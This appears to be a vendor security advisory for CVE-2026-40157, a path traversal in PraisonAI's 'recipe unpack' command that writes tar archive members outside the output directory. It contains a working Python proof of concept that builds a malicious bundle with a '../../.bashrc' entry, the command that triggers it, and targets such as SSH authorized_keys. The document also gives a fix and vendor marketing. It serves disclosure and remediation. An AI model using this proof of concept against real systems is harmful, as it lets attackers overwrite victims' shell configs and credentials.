CVE-2026-40157

CVE-2026-40157 is a critical-severity path traversal vulnerability in PraisonAI (pip), affecting versions >= 2.7.2, < 4.5.128. It is fixed in 4.5.128.

Summary

Field Value
Severity Critical
Type Path traversal -- arbitrary file write via tar.extract() without member validation
Affected src/praisonai/praisonai/cli/features/recipe.py:1170-1172

cmd_unpack in the recipe CLI extracts .praison tar archives using raw tar.extract() without validating archive member paths. A .praison bundle containing ../../ entries will write files outside the intended output directory. An attacker who distributes a malicious bundle can overwrite arbitrary files on the victim's filesystem when they run praisonai recipe unpack.

Details

The vulnerable code is in cli/features/recipe.py:1170-1172:

for member in tar.getmembers():
    if member.name != "manifest.json":
        tar.extract(member, recipe_dir)

The only check is whether the member is manifest.json. The code never validates member names -- absolute paths, .. components, and symlinks all pass through. Python's tarfile.extract() resolves these relative to the destination, so a member named ../../.bashrc lands two directories above recipe_dir.

The codebase does contain a safe extraction function (_safe_extractall in recipe/registry.py:131-162) that rejects absolute paths, .. segments, and resolved paths outside the destination. It is used by the pull and publish paths, but cmd_unpack does not call it.

# recipe/registry.py:141-159 -- safe version exists but is not used by cmd_unpack
def _safe_extractall(tar: tarfile.TarFile, dest_dir: Path) -> None:
    dest = str(dest_dir.resolve())
    for member in tar.getmembers():
        if os.path.isabs(member.name):
            raise RegistryError(...)
        if ".." in member.name.split("/"):
            raise RegistryError(...)
        resolved = os.path.realpath(os.path.join(dest, member.name))
        if not resolved.startswith(dest + os.sep):
            raise RegistryError(...)
    tar.extractall(dest_dir)

PoC

Build a malicious bundle:

import tarfile, io, json

manifest = json.dumps({"name": "legit-recipe", "version": "1.0.0"}).encode()

with tarfile.open("malicious.praison", "w:gz") as tar:
    info = tarfile.TarInfo(name="manifest.json")
    info.size = len(manifest)
    tar.addfile(info, io.BytesIO(manifest))

    payload = b"export EVIL=1  # injected by malicious recipe\n"
    evil = tarfile.TarInfo(name="../../.bashrc")
    evil.size = len(payload)
    tar.addfile(evil, io.BytesIO(payload))

Trigger:

praisonai recipe unpack malicious.praison -o ./recipes
# Expected: files written only under ./recipes/legit-recipe/
# Actual:   .bashrc written two directories above the output dir

Affected paths

  • src/praisonai/praisonai/cli/features/recipe.py:1170-1172 -- cmd_unpack extracts tar members without path validation

Impact

Path Traversal blocked?
praisonai recipe pull <name> Yes -- uses _safe_extractall
praisonai recipe publish <bundle> Yes -- uses _safe_extractall
praisonai recipe unpack <bundle> No -- raw tar.extract()

An attacker needs to get a victim to unpack a malicious .praison bundle -- say, through a shared recipe repository, a link in a tutorial, or by sending it to a colleague directly.

Depending on filesystem permissions, an attacker can overwrite shell config files (.bashrc, .zshrc), cron entries, SSH authorized_keys, or project files in parent directories. The attacker controls both the path and the content of every written file.

Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files. Typical impact: unauthorized file read or write outside the intended directory.

Affected versions

PraisonAI (>= 2.7.2, < 4.5.128)

Security releases

PraisonAI → 4.5.128 (pip)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Replace the raw extraction loop with _safe_extractall:

# cli/features/recipe.py:1170-1172
# Before:
for member in tar.getmembers():
    if member.name != "manifest.json":
        tar.extract(member, recipe_dir)

# After:
from praisonai.recipe.registry import _safe_extractall
_safe_extractall(tar, recipe_dir)

Frequently Asked Questions

  1. What is CVE-2026-40157? CVE-2026-40157 is a critical-severity path traversal vulnerability in PraisonAI (pip), affecting versions >= 2.7.2, < 4.5.128. It is fixed in 4.5.128. Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files.
  2. Which versions of PraisonAI are affected by CVE-2026-40157? PraisonAI (pip) versions >= 2.7.2, < 4.5.128 is affected.
  3. Is there a fix for CVE-2026-40157? Yes. CVE-2026-40157 is fixed in 4.5.128. Upgrade to this version or later.
  4. Is CVE-2026-40157 exploitable, and should I be worried? Whether CVE-2026-40157 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  5. What actually determines whether CVE-2026-40157 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  6. How do I fix CVE-2026-40157? Upgrade PraisonAI to 4.5.128 or later.

Other vulnerabilities in PraisonAI

Stop the waste.
Protect your environment with Kodem.